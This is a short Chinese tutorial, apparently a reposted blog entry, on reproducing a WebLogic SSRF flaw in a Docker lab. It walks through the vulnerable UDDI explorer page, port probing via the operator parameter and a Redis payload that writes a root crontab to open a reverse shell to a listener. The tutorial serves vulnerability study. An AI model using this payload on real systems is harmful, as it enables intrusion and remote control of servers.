如何实现Weblogic SSRF漏洞复现

一、使用docker搭建环境

docker安装及搭建环境教程:https://www.freebuf.com/sectool/252257.html

如何实现Weblogic SSRF漏洞复现

访问7001端口如何实现Weblogic SSRF漏洞复现

二、漏洞复现步骤

1、漏洞存在页面 /uddiexplorer/SearchPublicRegistries.jsp

如何实现Weblogic SSRF漏洞复现

2、检查一下IBM这个地方看看

如何实现Weblogic SSRF漏洞复现

发现是个连接,这就可能存在ssrf

3、使用burp suite抓包,点击Search

如何实现Weblogic SSRF漏洞复现

如何实现Weblogic SSRF漏洞复现

4、修改operator参数的连接

如何实现Weblogic SSRF漏洞复现

5、访问结果

访问不存在的端口返回 could not connect over HTTP

如何实现Weblogic SSRF漏洞复现

访问存在的端口返回状态码

如何实现Weblogic SSRF漏洞复现

访问内网

如何实现Weblogic SSRF漏洞复现

利用redis反弹shell的payload

set 1 "\n\n\n\n* * * * * root bash -i >& /dev/tcp/192.168.220.151/1234 0>&1\n\n\n\n"
config set dir /etc/
config set dbfilename crontab
save

以上就是如何实现Weblogic SSRF漏洞复现的详细内容,更多请关注其它相关文章!